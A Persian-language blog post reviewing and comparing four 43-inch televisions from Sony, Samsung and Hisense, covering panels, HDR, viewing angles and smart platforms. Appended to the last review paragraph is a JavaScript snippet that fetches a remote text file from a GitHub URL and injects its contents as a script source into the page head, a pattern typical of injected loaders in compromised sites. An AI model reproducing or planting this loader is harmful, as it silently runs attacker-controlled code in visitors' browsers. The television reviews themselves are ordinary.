دسته‌بندی نشده

معرفی بهترین تلویزیون های 43 اینچ از برند های مختلف

اگرچه برند های تولید کننده تلویزیون ها امروزه بیشتر بر روی سایز و اندازه های بزرگ تمرکز دارند اما هنور هم علاقه زیادی به تولید تلویزیون های کوچک دارند. در اندازه های کوچک این محصولات ویژگی و قابلیت های زیاد و مهم اندازه های بزرگ پیدا نمی شود اما هنوز گزینه های بسیار خوبی برای انتخاب در بین ان ها وجود دارد. اگر به دنبال یک تلویزیون در اندازه کوچک هستند بهتر است که اندازه 43 اینچ ان ها را تهیه کنید چراکه پیدا کردن یک گزینه مناسب در دسته کوچک تر مانند 40 و 42 اینچ کاری دشوار و سخت است. 

Sony KD-43X85J

بهترین تلویزیون 4K در سایز 43 اینچ از برند سونی مدل X85J می باشد. این تلویزیون دارای طراحی زیبا و جذاب است و از سری تلویزیون های میان رده می باشد که برای بسیاری از کار ها و نیاز های کاربران مناسب است و پاسخگویی مناسبی دارد. اگرچه در این مدل ویژگی های تلویزیون های بالا رده و گران قیمت وجود ندارد اما استفاده از ان می تواند بسیاری از کاربران را خشنود نگهدارد. در این تلویزیون از پنل VA با نسبت کنتراست بالا برای ایجاد رنگ های مشکی عمیق و یکنواخت استفاده شده است. در این پنل از لوکال دیمینگ برای تقویت کوالتی تصویر در صحنه های تاریک استفاده نشده است که یکی از کمبود های این تلویزیون محسوب می شود. این تلویزیون در اتاق های بسیار روشن عملکردی عالی دارد و بخوبی انعکاس نور روی پنل کنترل می شود. عملکرد HDR در این تلویزیون عالی است و محتویات HDR از دقت و وضوح بسیار بالا, رنج رنگی گسترده و روشنایی عالی روی نماشگر 43 اینچ برخوردار هستند. این تلویزیون از محدود تلویزیون های 43 اینچ  است که دارای ورودی HDMI 2.1 است به این معنا که بازی های 4K تا 120fps به خوبی روی ان اجرا می شود. متاسفانه در این تلویزیون زاویه دید گسترده پشتیبانی نمی شود و تصاویر در قسمت های زاویه ای تا حدی دچار افت کیفیت می شوند. 

SAMSUNG UN43AU8000FXZA

اگر به دنبال تلویزینی با قیمت مناسب تر و ارزان تر هستید AU8000 گزینه مناسب و کاربردی می باشد. این تلویزیون از ورودی HDMI 2.1 پشتیبانی نمی کند و مانند تلویزیون X85J روشن نمی شود اما انتظارات کاربران را نسبت به یک تلویزیون ارزان قیمت پایین رده براورده می کند. این تلویزیون کنترل بهتری روی انعکاس نور دارد و از پلتفرم تایزن بجای گوگل تی وی استفاده شده در X85J بهرمند است بنابراین کارکردی اسان تر و ساده تر دارد. این تلویزیون بخوبی محتوا کم کیفیت را ارتقا می دهد بنابراین گزینه ای عالی برای تماشا محتویات و انتقال تصاویر از طریق کابل می باشد. زاویه دید این تلویزیون محدود است اما نسبت کنتراست بسیار عالی و بی نظیر دارد. 

Sony KD-43X80J

اگر می خواهید از تلویزیون 43 اینچ خود به عنوان یک مانیتور استفاده کنید X80J سونی گزینه ای کاربردی و مناسب برایتان خواهد بود. این تلویزیون یک مدل میان رده است که پایین تر از X85J قرار می گیرد اما از پنل متفاوتی بهرمند است که برای استفاده به عنوان مانیتور بسیار مناسب است. در این تلویزیون از پنل IPS استفاده شده است بنابراین زاویه دید گسترده ای دارد و مناسب برای چینش صندلی در بخش های مختلف و تماشا کردن محتوا در زوایا مختلف است. از ویژگی های بسیار مهم برای تلویزیونی که به عنوان مانیتور استفاده می شود نمایش مناسب chroma 4:4:4 است که به وضوح متن و کلمات کمک می کند. در نرخ رفرش 60 هرتز متن و نوشته با وضوح 1080p و فورکی پخش می شوند. این تلویزیون دارای تاخیر ورودی پایین در حالت بازی است که باعث ایجاد تجربه بالا و مناسب روی دسکتاپ می شود بنابراین هیچگونه تاری هنگام اسکرول فایل های مختلف مشاهده نمی شود. نور های پس زمینه این تلویزیون ضد فلیکر هستند که ویژگی نادر در تلویزیون ها محسوب می شود و کمک می کند تا در مدت زمان طولانی کارکردن با پنل چشم کاربران اذیت نشود. کنترل انعکاس این تلویزیون در حد متوسط است و پنل ان نمی تواند در حد زیادی روشن شود بنابراین تنها در اتاق های نور متوسط می توان از ان استفاده کرد. 

HISENSE 43A6G

اگر می خواهید یک تلویزیون با رابط خوب و امکانات اسمارت مناسب تهیه کنید تلویزیون هایسنس مدل 43A6G گزینه مناسب و کاربردی می باشد. عملکرد این تلویزیون در صحنه های تاریک مانند تلویزیون های قبلی عالی و چشمگیر نمی باشد اما با بکارگیری پنل IPS برای ان زاویه دید گسترده و مناسب ارائه می شود. این تلویزیون دارای پلتفرم کاربردی و کاربر پسند اندروید است و منو بسیار ساده ای دارد. روی ریموت کنترل یک میکروفون توکار تعبیه شده است که با استفاده از دستیار های صوتی گوگل و الکسا دستورات صوتی را اجرا خواهد کرد. تصاویر و محتوا رزولوشن پایین به اسانی در این تلویزیون ارتقا داده می شود اما هیچ ویژگی خاص و متفاوتی در نحو نمایش تصاویر و کیفیت تصویر روی نمایشگر وجود ندارد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *